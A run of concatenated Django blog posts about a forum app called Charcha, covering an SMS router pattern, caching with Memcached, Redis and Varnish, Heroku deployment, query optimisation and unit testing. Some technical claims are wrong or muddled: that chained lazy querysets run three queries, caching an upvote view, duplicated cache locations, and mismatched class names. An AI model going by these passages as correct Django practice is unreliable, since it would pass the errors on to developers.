# We rename SmsClient to WatertelSmsClient
# This makes the intent of the class clear
# We don't change anything else in the class
class WatertelSmsClient(object):
    def send_sms(self, phone_number, message):
    ...
# This is our new class to send sms using Milio's APi
class MilioSmsClient(object):
    def send_sms(self, phone_number, message):
    ...
class SmsClientWithRetry(object):
    def __init__(self, sms_client):
        self.delegate = sms_client
    def send_sms(self, phone_number, message):
        # Insert start of retry loop
        self.delegate.send_sms(phone_number, message)
        # Insert end of retry loop
_watertel_client = SmsClient(url, username, password)
# Here, we are passing watertel_client
# But we could pass an object of MilioClient,
# and that would still give us retry behaviour
sms_client = SmsClientWithRetry(_watertel_client)

The logic to Split Traffic

Now let’s look at the next requirement – how do we split the traffic between the two implementations?
The logic is actually simple. Generate a random number between 1 and 100. If it is between 1 and 80, use WatertelSmsClient. If it is between 81 and 100, use MilioSmsClient. Since the number is random, over time we will get an 80/20 split between the implementations.

Introducing a Router class

Now that we have retry logic for Milio in place, let’s face the elephant in the room – where should we put this logic? We cannot change the existing client implementations. And of course, we can’t put this logic in MilioSmsClient or WatertelSmsClient – that logic doesn’t belong there.
The only way out is one more indirection. We create an intermediate class that is used by all existing clients. This class decides to split the logic between MilioSmsClient and WatertelSmsClient. Let’s call this class SmsRouter.

class SmsRouter:
    def send_sms(self, phone_number, message):
        # Generate random number
        # Between 1-80? Call send_sms method in SmsClient
        # Between 80-100? Call send_sms method in MilioClient
        pass

Providing Concrete Implementations to SmsRouter

Our SmsRouter needs instances of SmsClient and MilioClient. The easiest way is for SmsRouter to create the objects in the constructor.

class SmsRouter:
    def __init__(self, milio_url, milio_access_token,
                       watertel_url, watertel_username, watertel_password):
        self.milio = MilioSmsClient(milio_url, milio_access_token)
        self.watertel = WatertelSmsClient(watertel_url, watertel_username, watertel_password)

If you feel the code is ugly, you are not alone. But why is it ugly?
We are passing 6 parameters to the constructor, and are constructing objects in the constructor. If these classes require new parameters, our constructor will also change
To remove this ugliness, we pass fully constructed objects to SmsRouter, like this:

class SmsRouter:
    def __init__(self, milio, watertel):
        self.milio = milio
        self.watertel = watertel

Okay, this is a lot better, but it’s still not great. Our SmsRouter has hard coded percentages for each of the clients. We can do better.

class SmsRouter:
    def __init__(self, milio, milio_percentage, watertel, watertel_percentage):
        self.milio = milio
        self.milio_percentage = milio_percentage
        self.watertel = watertel
        self.watertel_percentage = watertel_percentage

Eeks. We again went up to four parameters. Again, why is this ugly? SmsRouter doesn’t really care about the difference between milio or watertel, but it still has variables with those names.

Generalizing SmsRouter

Let’s generalize it by passing a list of sms providers.

class SmsRouter:
    def __init__(self, providers):
        '''Providers is a list of tuples, each tuple having a provider and a percentage
           providers = [(watertel, 80), (milio, 20)]'''
        self.providers = providers
    def _pick_provider(self):
        # Pick up a provided on the basis of the percentages provided
        # For now, we will pick a random one
        return self.providers[randint(0, 1)][0]
    def send_sms(self, phone_number, message):
        provider = self._pick_provider()
        provider.send_sms(phone_number, message)

With this version of SmsRouter, we can now provide multiple implementations, and the router will intelligently delegate to the right router.

Using our SmsRouter

This is how we can now use the router:

# First, create the concrete implementations
watertel = SmsClient("https://watertel.example.com", "username", "password")
milio = MilioClient("https://milio.example.com", "secret_access_token")
# Create a router with an 80/20 split
sms = SmsRouter([(watertel, 80), (milio, 20)])
# Calling the send_sms in a loop will on an average
# send the messages using the percentages provided
for x in range(1, 10):
    sms.send_sms("99866%s" % (x * 5, ), "Test message %s" % x)

 

So why composition over inheritance?

Object composition has another effect on system design. Favoring object composition over inheritance helps you keep each class encapsulated and focused on one task. Your classes and class hierarchies will be small and will be less likely to grow into unmanageable monsters.

Also, we were able to add additional functionality without modifying the existing code. This is an example of composition – wrapping existing functionality in powerful ways.

 Download E-Book

In this post, we will go through how to assess which cache can be used and how to use it. The inspiration of this post has mainly been, to introduce a caching mechanism in
Charcha Discussion Forum. The source code for the Charcha forum is available here.

Why is this required?

Caching is one of the most useful techniques used by developers to improve the performance of their application. The challenges that most sites face is that they have to serve multiple clients and for an obvious reason your application might have to show different data or templates to different clients based on your use-case.

Let’s take an example to better explain this, let’s say you are an admin of Charcha and you are authorized to see all the comments and votes given to all the blogs. Now let’s say a new user comes along and all he/she is authorized to do is see the blog and the top comment. According to this logic, your server would have to make separate queries to the database and generate different templates based on your authorization (let’s just say permissions from now onwards).

Now, this is just a simple example using Charcha, if we go higher we might find that these sort of cases are really common. For a high traffic website, you would basically be asking your server to handle  X number of requests, making it perform  N number of queries to generate some ‘y’ number of templates. We can all agree that for high traffic sites the overhead can be pretty overwhelming. To counter this we introduce caching.

What caching would be doing is, it would be removing the burden of you having to do the queries, again and again, rather it would just store the result and send it directly to the client. Now, this all sounds pretty much on the upside but caching does have a lot of drawbacks.

Django already comes with a cache system where it lets you save the pages but that’s not it, Django does much more than that. It provides you with different levels of cache granularity. In this blog, we would discuss which cache system is best suited for us. We would tackle the advantages and disadvantages of the caches as well. Let’s try dividing all the cache that could be used as per the aforementioned levels of cache granularity.

Do note that Charcha might not really require cache at all if the maintenance might be high. We have already introduced some cache which has already been mentioned in our one of our posts.

Setting up Cache in Django

Setting up cache in django is exceedingly easy. All we have to do is define what type of caching do we want to integrate in our settings.py (or common.py in Charcha), how long will it live for and where it can be stored.
Let’s tackle all the levels of cache granularity that django provides us.

1. Caching Database

Django provides us with the availability of saving the cached data to our database. This works swimmingly if we have a well-indexed database.
To set it up all we have to do is create the cache database table as given below:

$ python manage.py createcachetable 

This will make the table as per the expected configuration of your django app. Now, all we have to do is set the backend in our cache preference and set the location of the database table.

CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
        'LOCATION': 'cache_data_table',
    }
}

And we are done. This is not as effective and would probably require a lot of adjustments once we start using a lot of tables. Since there are better options available we are going to have a look at those.
[/et_pb_text][et_pb_text admin_label=”2. Using Memcached” _builder_version=”3.0.86″ background_layout=”light”]

2. Using Memcached

One of the most popular and efficient types of cache supported natively by Django is MEMCACHED. As the name suggest MEMCACHED is a memory based cache server. It can dramatically reduce the number of databases queries a server has to do and increase the performance of an application by 10x.

Generally, database calls are fast but not fast enough, since the query takes CPU resources to process and data is (usually) retrieved from disk. On the other hand, an in-memory cache, like,MEMCACHED takes very little CPU resources and data can be directly picked up from the memory. It’s not a query like structure like SQLrather MEMCACHED uses a key-value pair to get all the data, therefore for obvious reasons you go from a complexity of O(n) or O(n^2) to O(1).

There are a few ways to use,MEMCACHED you could individually install it (if you don’t already have it) by using the command below:

# Install on Debian and Ubuntu
$apt-get install memcached
# Install on Mac OS X (with Homebrew)
$brew install memcached

Once you have MEMCACHED installed, it is pretty easy to use it. All we have to do is call it in settings.py and we are done.

CACHES = {
    'default':{
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': '127.0.0.1:9000',
    }
}

One of the most popular features of MEMCACHED is its ability to share its cache over multiple servers. That means that we can basically run MEMCACHED daemons on multiple machines, and the program will treat the group of machines as a single cache. How?

CACHES = {
    'default':{
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': ['127.0.0.1:9000','127.0.0.1:9000'],
    }
}

We can also check the behavior of our cache using:

cache.set('hello', 'world')
cache.get('hello')

It feels like we have been going over how great MEMCACHED is but it has a huge disadvantage. Due to its cache granularity level (being memory), if the server crashes you lose all your data as well and that’s where it hits you. You basically go down with your server and restarting your server would basically be like a clean slate on your MEMCACHED.

3. Using Django-redis

It’s a valid point to note that Redis holds many advantages over MEMCACHED, the only disadvantage being Redis is at a more lower granular level than MEMCACHEDRedis offers clustering, and unlike MEMCACHEDsupport is provided out-of-the-box. Being built-in provides a more robust solution that is easier to administrate. It is also exceedingly fast and easy to use. It uses the same key-value pair as its opponent, so it’s not going to be that difficult to understand. Overall, I feel that both these caching systems would not hold that big of a performance improvement over the other, so it boils more towards how comfortable you are with between the two systems.

Personally, I like Redis more as it is easier to set up and gives us a wider range of possibilities. The area where Redis wins over its opponents are it data persistence, restore and high availability. This might not really make sense to use unless your data is important.

So let us download Redis in our application and see it in action using this. Alternatively, you can install Redisusing the commands below:

$ wget http://download.redis.io/redis-stable.tar.gz
$ tar xvzf redis-stable.tar.gz
$ cd redis-stable
$ make

Let us run the server now using:

$ redis-server

Redis also provides us with this awesome cli. We can get in this cli and start seeing all the keys which are getting stored as well.

$ redis-cli ping
PONG

One of the ways Django can be integrated with Redis is through django-redis to execute its commands in Redis. We can install django-redis using:

pip install django-redis

django-redis is also going to be easy to include as all we have to do is add it in our settings.py. Do note that Redis by default runs on port 6379, so we are going to point to that location in our settings.pydjango-redisto listen to.

CACHES = {
    'default':{
        'BACKEND': 'django_redis.cache.RedisCache',
        'LOCATION': 'redis://127.0.0.1:6379/1',
        'OPTIONS': {
            'CLIENT_CLASS': 'django_redis.client.DefaultClient',
        },
        'KEY_PREFIX': 'example'
    }
}

Charcha does not have a big overhead, so adding django-redis might seem a bit like overkill and so did MEMCACHED but for implementation purposes, and for more heavy traffic sites we want to give you an example on how to use django-redis.

Let’s try seeing how well our application runs when we make a lot of requests at the same time. We can use loadtest here to make concurrent calls and assess the performance of django-redis.

$ loadtest -n 100 -k http://localhost:9000/discuss/1/
Before django-redis in loadtest
Before Django-Redis in loadtest

So the total time taken to load is about 7 seconds. This is pretty commendable but can be optimized a bit further. We need to startanalyzing why does it take this long and what all views are getting called. For thi,s we would use django-toolbar.

When we look at what the code is doing, we can make decisions on how to make changes to improve the performance. I can see that there are a lot of the same queries happening for the same requests. All I have to do is add:

url(r'^discuss/(?P\d+)/$', cache_page(5*60)(views.DiscussionView.as_view()), name="discussion"),

and reap all the benefits of django-redis. You can see the output below yourself. Stand back ladies and gentlemen, benchmarking are happening.

After django-redis in loadtest
After django-redis in loadtest

Yup, thats right. We have achieved a response of 2 seconds. The overhead is not that much so using django-redis here is more of a call we need to take.

4. Using Varnish

Varnish is a caching HTTP reverse proxy. It’s always going to be in front of your server be it Apache or Nginx. The way varnish works is, it helps in caching your static pages. The problem with varnish is that it cannot cache dynamic content. If your site is not as dynamic, you could make good use of varnish but you should always check which all views which can be cached and then cache them. Second, identify how long of a delay you could tolerate someone seeing stale content. The best thing about django and varnish is how well they both fit together.
Setting up varnish is also really easy to do:

$apt-get install varnish
$brew install varnish

Let’s take a page and see its performance and how it is working (for this we will take the discussion page).

Before Varnish
Before Varnish

How will Varnish help? What does it do? Basically, Varnish is going to sit between your django and your users. So, all we have to do now is add the cache_page decorator on our view and it is going to do everything for us. Let’s try applying it in the upvote_post and see what happens.

from django.views.decorators.cache import cache_page
@cache_page(60)
def upvote_post(request, post_id):
	...
After Varnish
After Varnish

What just happened? Well, the varnish was waiting for the response from upvote_post and when you made a server call to the function, it held the response with itself. Now the next time we made the call, without having to go to the server view again, ‘varnish’ just sent back the response.
To be more secure we could add a cookie header with the request so we could have some security at this level as well.
This entire implementation is what is called as the per-view cache. To explain it in a more layman term, we are basically storing/caching all the responses from the views individually.
Varnish also has its own configuration language, this can be used in places for normalization where the endpoints are not different based on the user’s authentication. How?

sub vcl_recv {
	// Urls can be stripped of all the cookies
	if(req.url == "/" || req.url ~ "^/comments/") {
		unset req.http.Cookie;
	}
}

We can go ahead with Varnish for now and start caching the views at least. This has a lot of documentation and I urge you to read up on it.

 Summary

Caching as previously mentioned is a way of reducing the server load and improving the performance of your application. Although most caches assiduously keep on working to reduce the dependency on your server, one must always keep in mind the overhead of the cache as well.

Charcha might not require that many levels of caches as compared to high traffic sites. If we take an example, where Charcha becomes something like stackoverflow we can start adding cache to reduce the server response, something like using Redis/django-redis as a store for storing objects, the result of DB queries and use Varnish for serving our static pages. It really depends on your use-case and what you require your cache to do.

For now, in Charcha, the previous implementation for caching as mentioned in our previous post would do just fine.

This article is part of our blog series on Django development, where we explore ways to deploy Django apps to Heroku. We have built a Django application named Charcha, and now let us see the required steps to deploy this application to Heroku.

 

Install Heroku CLI

Sign up for an account on Heroku, then follow this link to install Heroku CLI.
Once the CLI is set up, log in from your terminal using the following command:

$ heroku login
Enter your Heroku credentials.
Email: devashish@hashedin.com
Password (typing will be hidden):
Authentication successful.

Configuring the application for Heroku

Heroku web applications require a Procfile. This file is important to declare application process types and entry points. It must be located in the root of the repository. Here is the content of the Procfile that we will use:

web: gunicorn charcha.wsgi

This requires Gunicorn, the production web server for Django applications.

Installing gunicorn

$ pip install gunicorn
$ pip freeze > requirements.txt

Database Configuration

For this, we use the dj-database-url library to extract database configurations from the environment.
For Django applications, a Heroku Postgres hobby-dev database is automatically provisioned. This populates the DATABASE_URL environment variable.

To set up the database, we will add the following code in settings.py:

# Update database configuration with $DATABASE_URL.
import dj_database_url
db_from_env = dj_database_url.config()
DATABASES['default'].update(db_from_env)

Static assets management and serving

Configure the static directories in settings.py:

# https://docs.djangoproject.com/en/1.9/howto/static-files/
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
    os.path.join(PROJECT_ROOT, 'static'),
)

By default, Django does not serve static files in production. Hence, we will use WhiteNoise for serving static assets in production.

 

Installing Whitenoise

$ pip install whitenoise
$ pip freeze > requirements.txt

settings.py

STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'

wsgi.py

from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
application = get_wsgi_application()
application = DjangoWhiteNoise(application)

Building the app locally

Run the following command to test Heroku deployment locally.

$ heroku local web

This will run the Procfile and consequently you can debug any errors if any on your local machine.

Deploy to Heroku

Finally, we are now ready to deploy our application. Follow these steps to successfully deploy to Heroku.
Commit all changes to git.

$ git add .
$ git commit -m "Added a Procfile."

 

Login to Heroku

$ heroku login
Enter your Heroku credentials.
...

 

Create an app Lets name the app “Charcha”. Heroku will create a random app name if none is provided.

$ heroku create charcha

 

Push to Heroku remote

$ git push heroku master

After the app is deployed, use this command to open the app in your browser:

$ heroku open

Summary

We have learned how to configure our application to deploy easily on Heroku. We have also learnt about dj-database-url to setup database and whitenoise to serve static files in production.

This is the seventh post on the Django blog series. In this post we will learn on how we can optimize the django application’s performance. The inspiration of this post has mainly been, the performance improvement of Charcha Discussion Forum. The source code for the charcha forum is available here.

For this post, like all preceding posts in this series, we are going to use Charcha’s codebase as an example and try to optimize the pages from there on out. Also, as the range for optimization is exceedingly high we would try to tackle all the domains one by one. The main focus would be to attain maximum proficiency in the backend (as it is a django application at the end of the day) and the measurement would be done through django debug toolbar.

The way we are going to proceed with this is by seeing the performance of the application and see where all can we optimize it domain by domain. To perform the assessment on the site we would be using a bunch of tools, the most important one being django debug toolbar and chrome’s network tab. We are going to hit the front-end portion first and move forward from there.

Optimizing the Front-end:

Typically when you are looking to optimize the application on the front-end we should look for the entire stack to understand how our app is working. This approach should always be followed in all cases as it gives you a better perspective on how things are functioning.

Charcha uses server-side rendering instead of client-side rendering. This on its own solves a lot of problems for us. How?? When performing client-side rendering, your request loads the page markup, its CSS, and its JavaScript. The problem is that all the code is not loaded at once. Instead what happens is JavaScript loads and then makes another request, gets a response and generates the required HTML whereas, with server-side rendering, your initial request loads the page, layout, CSS, JavaScript, and content. So basically, the server does everything for you.

The moment I got to know that Charcha is rendering its template from the server, my focused turned towards looking at only caching and minification of the pages (to be honest this should be present in all applications).

Caching Approach:

Before we start writing any code I want you to understand the working of caching in server-side rendering and how powerful it really is? As you may know, whenever there is an endpoint which returns any data, it can generally be cached. So the main question is that can we cache HTML elements? Yes, by rendering on the server we can easily cache our data.

So what’s going to happen is that the first time your client will get a response and that response will now be cached, so the next time when the same response is made not only will your browser have to do the rendering, your server will also not have to. Now that we have an approach for caching we can start implementing it. In order to perform server-side caching, we are going to use whitenoise. Now to integrate whitenoise in our Django app, we just have to follow the following steps:

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'whitenoise.middleware.WhiteNoiseMiddleware',
    ...
]

Now whitenoise is going to start serving all your static files but our main purpose for caching is still not done. One thing to note here is that whitenoise also supports compression which we can use.

# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_HOST = os.environ.get('DJANGO_STATIC_HOST', '')
STATIC_URL = STATIC_HOST + '/static/'
INSTALLED_APPS = [
    ...
    # Disable Django's own staticfiles handling in favour of WhiteNoise, for
    # greater consistency between gunicorn and `./manage.py runserver`. See:
    # http://whitenoise.evans.io/en/stable/django.html#using-whitenoise-in-development
    'whitenoise.runserver_nostatic',
    'django.contrib.staticfiles',
    ...
]
def cache_images_forever(headers, path, url):
    """Force images to be cached forever"""
    tokens = path.split(".")
    if len(tokens) > 1:
        extension = tokens[-1].lower()
        if extension in ('png', 'jpg', 'jpeg', 'ico', 'gif'):
            headers['Cache-Control'] = 'public, max-age=315360000'
WHITENOISE_ADD_HEADERS_FUNCTION = cache_images_forever

Now our caching for the front-end is complete. Let’s move on to the second phase of front-end optimization and try to minify our files.

Minifying the Files:

For minifying our files we are going to use spaceless template tags. Although this will not minify our files per se, it is still going to give us a better result as it would help us reduce our page weight. How?? Well, spaceless template tagsremoves whitespace between HTML tags. This includes tab characters and newlines. This is really easy to implement in Django templates. All we need to add is spaceless and close it with endspacelessin our base.html. As our base.html is going to be used everywhere as the basic skeleton, we can be sure that it will be applied to all the other templates within it as well.

Now that we are done with our front-end optimization let’s move to our back-end. This is perhaps the one place where we would be able to achieve the maximum amount of efficiency.

Optimizing the Back-end:

Ideally, the flow for optimizing your code is to move from your queries to how your Django is functioning. In queries, we need to see the number of queries, the amount of time it takes to execute the query and how our Django ORM'S are working. Internally Django already does a lot for us but we can optimize its queries even further.
We need to start scavenging the code and check the total number of query calls per page. There are a few ways to do this. The most obvious one being logging all the queries in sql.log and start reading the queries from there. There is one other way of accomplishing this, that is by using django debug toolbar.

Now django debug toolbar is a really powerful tool and extremely easy to use. It helps in debugging responses and provides us with a bunch of configurable panels that we could use. We are mainly going to use this to see how quick our queries are and if we are performing any redundant queries.

Django Debug Toolbar

So let’s first integrate the toolbar in Charcha. To install django debug toolbar we are going to follow this doc. Its pretty straightforward and easy to implement. So first we need to install the package using pip.

 $ pip install django-debug-toolbar

One thing to note here is that if you are using a virtualenv avoid using sudo. Ideally we should not be using sudo anyways if we are in a virtualenv. Now our django debug toolbar is installed. We need to now add it in our settings.py INSTALLED_APPS by adding debug_toolbar.

INSTALLED_APPS = [
    ...
    'django.contrib.staticfiles',
    ...
    'debug_toolbar',
    ...
]

Now we need to put the debug toolbar in our middleware. Since there is no preference of the django debug toolbar middleware the middleware stack we can add it wherever we see fit.

MIDDLEWARE = [
    # ...
    'debug_toolbar.middleware.DebugToolbarMiddleware',
    # ...
]

Now we need to add the url to configure the toolbar. We just need to add the url and put it in our DEBUG mode, the rest django debug toolbar will take care of, on its own.

from django.conf import settings
if settings.DEBUG:
    import debug_toolbar
    urlpatterns = [
        url(r'^__debug__/', include(debug_toolbar.urls)),
    ] + urlpatterns

There are also a few configurations that we could use but for now we are going to set it to default as its not required (with the correct version this should be done automatically).

DEBUG_TOOLBAR_PATCH_SETTINGS = False

Also, since we are using our local we need to set the following INTERNAL_IP for django debug toolbar to understand.

INTERNAL_IPS = ('127.0.0.1',)

And now we test. Mostly our screen would look something like the image below.

Django Debug toolbar
Django Debug Toolbar in Action

We can now start checking the number of queries that are being run and how much time they are taking to execute as well.

This part is actually a bit easy as all we have to do is set a benchmark on the basis of the amount of data that we have. We also need to consider the higher effect where if we have a lot of data within a lot of foreign keys, we might need to start using indexes there.

To show how we are going to refactor the code we went ahead and started seeing the performance of all the pages. Most refactoring would mostly look at how we could reduce the number of queries. As an example we are going to look at the discussion page.

Django Debug toolbar
Django Debug Toolbar in the discussion page

Now according to the django debug toolbar there are a lot of queries that we are making 8 queries whenever we are making our call to see the post. This would, later on, start giving us problems if we don’t eliminate a few of them. The way we are going to approach optimizing queries is in subparts as follows:

Solving N+1 queries:

We can solve the problem of N+1 queries simply by using prefetch_related and select_related in Charcha. With the two functions, we can have a tremendous performance boost as well. But first, we need to understand what exactly is it that they do and how can we implement it in Charhca.

select_related should be used when the object that you are selecting in a single object of a model, so something like a ForeignKey or a OneToOneField. So whenever you make such a call, select_related would do a join of the two tables and send back the result to you thereby reducing an extra query call to the ForeignKey table.
Let’s see an example to better understand how we can integrate this in Charcha.
We are going to take the example of the Post model which looks something like this:

class Post(Votable):
    ...
    objects = PostsManager()
    title = models.CharField(max_length=120)
    url = models.URLField(blank=True)
    text = models.TextField(blank=True, max_length=8192)
    submission_time = models.DateTimeField(auto_now_add=True)
    num_comments = models.IntegerField(default=0)
    ...

Do note that we have a custom manager defined, so whichever query we need to execute we can define it in our manager. Now in your first glance, you can see that our class Post is inheriting from Votable, so we now need to see what is happening in this class.

class Votable(models.Model):
    ...
    votes = GenericRelation(Vote)
    author = models.ForeignKey(User, on_delete=models.PROTECT)
    ....

Whenever we make a call to check the Author of our Post we will be doing an extra call to the database. So now we go to our custom manager and change the way are fetching the data.

class PostsManager(models.Manager):
    def get_post_with_my_votes(self, post_id, user):
        post = Post.objects\
            .annotate(score=F('upvotes') - F('downvotes'))\
            .get(pk=post_id)
        ...
        return post

If we use the django debug toolbar you would see that whenever we do a call like get_post_with_my_votes().author, we are going to be executing an extra query to the User table.

Before select_related
Before select_related

This is not required and can be rectified easily by using select_related. What do we have to do? Just add select_related to the query.

class PostsManager(models.Manager):
    def get_post_with_my_votes(self, post_id, user):
        post = Post.objects\
            .annotate(score=F('upvotes') - F('downvotes'))\
            .select_related('author').get(pk=post_id)
        ...
        return post

And that’s it. Our redundant query should be removed. Lets check it using django debug toolbar.

After select_related
After select_related

We can use prefetch_related when we are going to get a set of things, so basically something like a ManyToManyField or a reverse ForeignKey. How does this help? Well, the way prefetch_related works is it makes another query and therefore reduces the redundant columns in the original object. This as of now is not really required so we are going to let it be.

* Query in a loop:

Though this is not done anywhere in Charcha but this a practise which a lot of people follow without realising its impact. Although this seems pretty basic I still feel that requires its separate section.

post_ids = Post.objects.filter(id = ?).values_list('id', flat=True)
authors = []
for post in post_ids:
    #Disaster as when we would have a lot of post_ids say around 10,000
    #we would be making that many calls, basically (n+1) calls.
    post = Author.objects.filter(id= post_ids)
    authors.append(post)

The above example is just a sample of how disasterous a query in a loop could be for a large dataset and this above example can easily be solved by the previous discussion (on select_related and prefetch_related) which we had.

Denormalization:

I recommend using denormalization only if we have some performance issues and not prematurely start optimizing it. We should check the queries before we start with our denormalization as it does not make any sense if we keep on adding more complexity if it is not impacting our performance.

The best place to explain denormalization implementation in Charcha is in the Votable model as done in the 2nd blog of this series. Why the Votable table? This is because we want to show the score i.e. upvotes – downvotes and the comments on the home page. We could make a join on the Votable table and call it from there but it would slow down our system. Instead what we are doing is, adding the fields of upvotesdownvotes and flag in the Votable model. This would in turn reduce our calls.

class Votable(models.Model):
    ...
    upvotes = models.IntegerField(default=0)
    downvotes = models.IntegerField(default=0)
    flags = models.IntegerField(default=0)
    ...

Now we can just inherit these properties in whichever models we require and from there we can move forward. Although this seems pretty easy to implement it does have a drawback. Every time there is some changes that is made, we would have to update these fields. So instead of making a JOIN we would rather have a more complex UPDATE.

WBS for Tracking Comments Hierarchy

This is also a form of denormalization. Each comment needs a reference to its parent comment and so on , so it basically makes something like the tree structure.

class Comment(Votable):
    ...
    wbs = models.CharField(max_length=30)
    ...

The problem here is that self-referential calls are exceedingly slow. So we can refactor this approach and add a new field called wbs which would help us track the comments as a tree. How would it work? Every comment would have a code, which is a dotted path. So the first comment would have the code “.0001” and the second top-level comment would have the code “.0002” and so on. Now if someone responds to the first comment it gets a code of “.0001.0001”. This would help us avoid doing self-referential queries and use wbs instead.

Now the limitation for this field is we would only allow 9999 comments at each level and the height of the wbs tree would only go till 6, which is sort of acceptable in our case. But in the case of having to go through a large database, we would have to index this field as well. We would discuss this in the next section.

Adding Indexes

Indexes is one of the many standard DB optimization techniques and django provides us with a lot of tools to add these indexes. Once we have identified which all queries are taking a long time we can use Field.db_index or Meta.index_together to add these from Django.

Before we start adding indexes we need to identify where all should we add these properly and to do that we will use django debug toolbar to see how fast we get our response. Now we are going to look at the post which we had before and we are going to track its queries. We are going to select a query which we could easily optimize indexes (given below)

Before indexes
Before indexes
SELECT ••• FROM "votes" WHERE ("votes"."type_of_vote" IN ('1', '2') AND "votes"."voter_id" = '2' AND "votes"."content_type_id" = '7' AND "votes"."object_id" = '1')

Now, this particular query is taking 1.45s to execute. Now, all we have to see is the table and which field we could add the index on. Since this query belongs to model Votes we are going to add the index on content_type_id and object_id. How?

class Vote(models.Model):
    class Meta:
        db_table = "votes"
        index_together = [
            ["content_type", "object_id"],
        ]

And that’s all we have to do. Now we run our migrations and check our performance.

After indexes
After indexes

Now, this query is taking only 0.4 seconds to execute and that is how easy it is to implement indexes.

Django QuerySets are LAZY

One thing to note when using django is that django querysets are lazy , what that means is queryset does not do any database activity and django will only run the query when the queryset is evaluated. So if we make a call from the Post model like

q = Post.objects.filter(...)
q = q.exclude(...)
q = q.filter(...)

This would make three separate queries which is not really required.

Caching sessions

One thing to notice using the django debug toolbar is that almost all the pages have a query made to retrieve the Django session.

Before cookie based sessions
Before cookie based sessions

The query that we are tackling is given below and since its being used in almost all the places we can simply cache it once and reap the benefits everywhere else.

SELECT ••• FROM "django_session" WHERE ("django_session"."session_key" = '''6z1ywga1kveh58ys87lfbjcp06220z47''' AND "django_session"."expire_date" > '''2017-05-03 10:56:18.957983''')

By default, Django stores the sessions in our database and expects us to occasionally prune out old entries which we would not be doing.

So on each request, we are doing a SQL query to get the session data and another to grab the User object information. This is really not required and we can easily add a cache here to reduce the load on our server. But the question still remains on which store should we use? From a higher operational point of view, introducing a distributed data store like redis is not really required. Instead, we could simply use cookie-based sessions here.

Do note that we would not be using cookie-based sessions for highly secure sites but Charcha does not need to be highly secure.

How do we implement it?

Using cookie-based sessions is very easy to do. We can simply follow the steps given in this link. All we have to do is add the following in our settings.py (or common.py as per Charcha) and see the magic happen. We will switch to storing our sessions in our cache and easily remove a SQL query from every single request to our site.

SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"

Now from the snapshot given below, we can see that our redundant query is removed.

After cookie based sessions
After cookie-based sessions

Hence, we have accomplished our task of optimizing our site.

Summary

In this post, we have discussed how one should proceed when optimizing their site. We have tackled all the domains, discussed the various techniques to optimize a Django site and talked about the tools like which django debug toolbar can be used for a sites assessment.

This is the sixth post in the Django Blog Series. In this post we will be discussing how implementing Django unit testing can assist our app Charcha, discussion forum application in Django to achieve a better quality safety net. You can find the full code for the Charcha forum here.
Before Diving into writing the unit tests for our app, we first need to understand why do we actually need to write them and what is the apt scenarios that should be taken care of with tests.

Why Should You Test Your Code?

“Quality is never an accident; it is always the result of intelligent effort.” – John Ruskin
Providing automated tests for your code is a way to repeatedly ensure, with minimal developer effort, that the code you wrote to handle a task works as advertised. I like to think of tests as my insurance policy. They generally keep me from breaking existing code & looking foolish to other people. They’re also concrete proof that the code works correctly. Without that proof, what you have is a pile of code that worked right once on your machine & that you’ll either have to hand-test again & again in the future or will break without you knowing any wiser.
This is not to say that tests solve everything. There will always be bugs in software. Maybe the tests miss a code path or a user will use something in an unexpected way. But tests give you better confidence & a safety net.

Types Of Testing

There are many different types of testing. The prominent ones this series will cover are Django unit tests and integration tests.
Unit tests cover very small, highly specific areas of code. There are usually relatively few interactions with other areas of the software. This style of testing is very useful for critical, complicated components, such as validation, importing or methods with complex business logic.
Integration tests are at the opposite end of the spectrum. These tests usually cover multiple different facets of the application working together to produce a result. They ensure that data flow is right & often handle multiple user interactions.
The main difference between these two types is not the tooling but the approach and what you choose to test. It’s also a very common thing to mix & match these two types throughout your test suite as it is appropriate. In this post, we’ll focus only on unit testing.

When should you really test?

Another point of decision is deciding whether to do test-first (a.k.a. Test Driven Development) or test-after. Test-first is where you write the necessary tests to demonstrate the proper behavior of the code Before you write the code to solve the problem at hand. Test-after is when you’ve already written the code to solve the problem, then you go back & create tests to make sure the behavior of the code you wrote is correct.
This choice comes down to personal preference. An advantage of test-driven development is that it forces you to not skimp on the tests & think about the API up front. However, it feels very unnatural at first & if you have no experience writing tests, you may be at a loss as to what to do. Test-after feels more natural but can lead to weak tests if they’re hurried & not given the proper time/effort.
Something that is always appropriate, regardless of general style, is when you get a bug report. ALWAYS create a test case first & run your tests. Make sure it demonstrates the failure, THEN go fix the bug. If your fix is correct, that new test should pass! It’s an excellent way to sanity check yourself & is a great way to get started with testing to boot.

Let’s get to it

Now that we’ve got a solid foundation on the why what & when of testing, we’re going to start diving into code. When you run python manage.py startup, this automatically creates tests.py file within your app where we can write our tests.
Before writing the test cases we need to import TestCase module and models from our models.py. Here’s the snippet for it:

from django.test import TestCase
from django.contrib.auth.models import AnonymousUser
from .models import Post, Vote, Comment, User

 

Adding Tests to Views

class DiscussionTests(TestCase):
    def setUp(self):
        self._create_users()
    def _create_users(self):
        self.ramesh = User.objects.create_user(
            username="ramesh", password="top_secret")
        self.amit = User.objects.create_user(
            username="amit", password="top_secret")
        self.swetha = User.objects.create_user(
            username="swetha", password="top_secret")
        self.anamika = AnonymousUser()
    def new_discussion(self, user, title):
        post = Post(title=title,
            text="Does not matter",
            author=user)
        post.save()
        return post

This code sets up a new test case(DiscussionTests), which you can think of as a collection of related tests. Any method written here will be run automatically & its output will be included in the testing output when we run the command.
